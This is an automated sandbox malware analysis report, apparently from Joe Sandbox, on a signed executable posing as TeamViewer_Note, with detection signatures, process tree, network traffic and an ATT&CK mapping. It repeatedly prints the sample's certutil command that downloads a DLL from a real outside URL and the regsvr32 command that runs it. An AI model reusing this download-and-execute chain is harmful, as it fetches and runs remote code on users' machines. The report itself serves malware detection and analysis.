Loading ...

Play interactive tourEdit tour

Windows Analysis Report cBQPecnQRp

Overview

General Information

Sample Name:cBQPecnQRp (renamed file extension from none to exe)
Analysis ID:483791
MD5:53817315b195e328ccc0f56b15b247c7
SHA1:7bedab96b89d000288b573de0b5693cf49dae47f
SHA256:ea2decec34ae3129d5da1f2035b34cff3c9f656bb4423904ef6b0a3ca5f47d5e
Tags:exeHartexLLCsigned
Infos:

Most interesting Screenshot:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:47
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Sigma detected: Regsvr32 Anomaly
Sigma detected: Suspicious Certutil Command
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • cBQPecnQRp.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\cBQPecnQRp.exe' MD5: 53817315B195E328CCC0F56B15B247C7)
    • cmd.exe (PID: 6152 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • certutil.exe (PID: 4528 cmdline: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' MD5: D056DF596F6E02A36841E69872AEF7BD)
      • regsvr32.exe (PID: 5340 cmdline: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', CommandLine: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6152, ProcessCommandLine: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', ProcessId: 5340
Sigma detected: Suspicious Certutil CommandShow sources
Source: Process startedAuthor: Florian Roth, juju4, keepwatch: Data: Command: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', CommandLine: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', CommandLine|base64offset|contains: q!, Image: C:\Windows\SysWOW64\certutil.exe, NewProcessName: C:\Windows\SysWOW64\certutil.exe, OriginalFileName: C:\Windows\SysWOW64\certutil.exe, ParentCommandLine: C:\Windows\System32\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6152, ProcessCommandLine: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', ProcessId: 4528

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: cBQPecnQRp.exeVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for domain / URLShow sources
Source: https://www.christchurchmvl.org/volunteer/actXApiLib.dllVirustotal: Detection: 11%Perma Link

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: cBQPecnQRp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2
PE / OLE file has a valid certificateShow sources
Source: cBQPecnQRp.exeStatic PE information: certificate valid
Binary contains paths to debug symbolsShow sources
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00466410 FindFirstFileExW,1_2_00466410

Networking:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\certutil.exeNetwork Connect: 100.26.95.170 187Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exeDomain query: www.christchurchmvl.org
Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Sep 2021 11:47:29 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: cBQPecnQRp.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: cBQPecnQRp.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: cBQPecnQRp.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: cBQPecnQRp.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cBQPecnQRp.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: cBQPecnQRp.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: cBQPecnQRp.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: cBQPecnQRp.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: cBQPecnQRp.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: cBQPecnQRp.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: cBQPecnQRp.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: cBQPecnQRp.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: cBQPecnQRp.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: cBQPecnQRp.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: cBQPecnQRp.exeString found in binary or memory: http://ocsp.digicert.com0O
Source: cBQPecnQRp.exeString found in binary or memory: http://ocsp.sectigo.com0
Source: cBQPecnQRp.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: cBQPecnQRp.exeString found in binary or memory: https://sectigo.com/CPS0
Source: certutil.exe, 0000000A.00000002.776165001.0000000000550000.00000004.00000020.sdmpString found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dll
Source: certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmpString found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dllC:
Source: cBQPecnQRp.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownDNS traffic detected: queries for: www.christchurchmvl.org
Source: global trafficHTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: www.christchurchmvl.org
Source: global trafficHTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Accept: */*User-Agent: CertUtil URL AgentHost: www.christchurchmvl.orgCache-Control: no-cache
Source: unknownHTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2

System Summary:

barindex
Source: cBQPecnQRp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'Jump to behavior
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004340B01_2_004340B0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00432A001_2_00432A00
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0049C0511_2_0049C051
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0046207C1_2_0046207C
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004520EB1_2_004520EB
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004020801_2_00402080
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004961AB1_2_004961AB
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004321AB1_2_004321AB
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004022101_2_00402210
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004443F01_2_004443F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0048C4C01_2_0048C4C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004744D01_2_004744D0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0049E4E71_2_0049E4E7
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004024F21_2_004024F2
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004685D01_2_004685D0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004845801_2_00484580
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004025A01_2_004025A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0048E6201_2_0048E620
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004027001_2_00402700
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0045A7C01_2_0045A7C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004847901_2_00484790
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004028501_2_00402850
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004249701_2_00424970
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004029E01_2_004029E0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00402B701_2_00402B70
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00464CC91_2_00464CC9
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00402CF01_2_00402CF0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00402E701_2_00402E70
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0048CFC01_2_0048CFC0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0049901A1_2_0049901A
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0045B2E01_2_0045B2E0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004773C01_2_004773C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004013901_2_00401390
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004334501_2_00433450
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004454F01_2_004454F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0046B48F1_2_0046B48F
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004514A01_2_004514A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004014B01_2_004014B0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0045154D1_2_0045154D
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004335691_2_00433569
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004755F01_2_004755F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0046B5AF1_2_0046B5AF
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004016101_2_00401610
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004936801_2_00493680
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004017601_2_00401760
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0048D7F01_2_0048D7F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004337A01_2_004337A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004998091_2_00499809
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004518BF1_2_004518BF
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0048B9A01_2_0048B9A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: String function: 00421740 appears 48 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: String function: 0044FEB0 appears 40 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: String function: 0044F762 appears 75 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: String function: 00420FA0 appears 63 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: String function: 0044F26F appears 71 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044E3F5 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,1_2_0044E3F5
Source: C:\Users\user\Desktop\cBQPecnQRp.exeProcess Stats: CPU usage > 98%
Source: cBQPecnQRp.exeBinary or memory string: OriginalFilename vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe, 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
Source: cBQPecnQRp.exeBinary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
Source: cBQPecnQRp.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: actxapilib.dllJump to behavior
Source: cBQPecnQRp.exeVirustotal: Detection: 10%
Source: cBQPecnQRp.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cBQPecnQRp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\cBQPecnQRp.exe 'C:\Users\user\Desktop\cBQPecnQRp.exe'
Source: C:\Users\user\Desktop\cBQPecnQRp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'Jump to behavior
Source: classification engineClassification label: mal72.evad.winEXE@8/1@2/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_01
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00422D90 LoadResource,LockResource,SizeofResource,1_2_00422D90
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCommand line argument: ~GI1_2_004946D0
Source: C:\Windows\SysWOW64\certutil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: cBQPecnQRp.exeStatic file information: File size 1363448 > 1048576
Source: cBQPecnQRp.exeStatic PE information: certificate valid
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe
Source: cBQPecnQRp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cBQPecnQRp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cBQPecnQRp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cBQPecnQRp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cBQPecnQRp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00434A6C push eax; ret 1_2_00434A91
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00410AAA push ss; iretd 1_2_00410AAB
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044F73C push ecx; ret 1_2_0044F74F
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00493990 push ecx; mov dword ptr [esp], ecx1_2_00493991
Source: cBQPecnQRp.exeStatic PE information: section name: .didat
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004A5845
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044E000 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044E000
Source: C:\Windows\SysWOW64\certutil.exe TID: 6060Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\cBQPecnQRp.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044C1E6 VirtualQuery,GetSystemInfo,1_2_0044C1E6
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00466410 FindFirstFileExW,1_2_00466410
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044EE91 IsDebuggerPresent,OutputDebugStringW,1_2_0044EE91
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004A5845
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004944F0 TlsGetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,TlsSetValue,GetProcessHeap,HeapFree,1_2_004944F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0046619E mov eax, dword ptr fs:[00000030h]1_2_0046619E
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00434891 mov eax, dword ptr fs:[00000030h]1_2_00434891
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044ECD5 mov esi, dword ptr fs:[00000030h]1_2_0044ECD5
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0045D9CF mov eax, dword ptr fs:[00000030h]1_2_0045D9CF
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044FE43 SetUnhandledExceptionFilter,1_2_0044FE43
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0045976E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0045976E
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044F8B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0044F8B8

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\certutil.exeNetwork Connect: 100.26.95.170 187Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exeDomain query: www.christchurchmvl.org
Source: C:\Users\user\Desktop\cBQPecnQRp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'Jump to behavior
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_00468B1F
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: EnumSystemLocalesW,1_2_00468DC7
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: EnumSystemLocalesW,1_2_00468E12
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: EnumSystemLocalesW,1_2_00468EAD
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00468F40
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetLocaleInfoW,1_2_004691A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_004692C6
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetLocaleInfoW,1_2_004693CC
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_0046949B
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: EnumSystemLocalesW,1_2_0046354D
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetLocaleInfoW,1_2_004639F3
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0041E0FC cpuid 1_2_0041E0FC
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00440690 GetLocalTime,1_2_00440690
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004A85C0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,1_2_004A85C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004A7879 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,1_2_004A7879

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter2DLL Side-Loading1Process Injection111Virtualization/Sandbox Evasion1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Application Shimming1DLL Side-Loading1Process Injection111LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Application Shimming1Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Information Discovery23VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious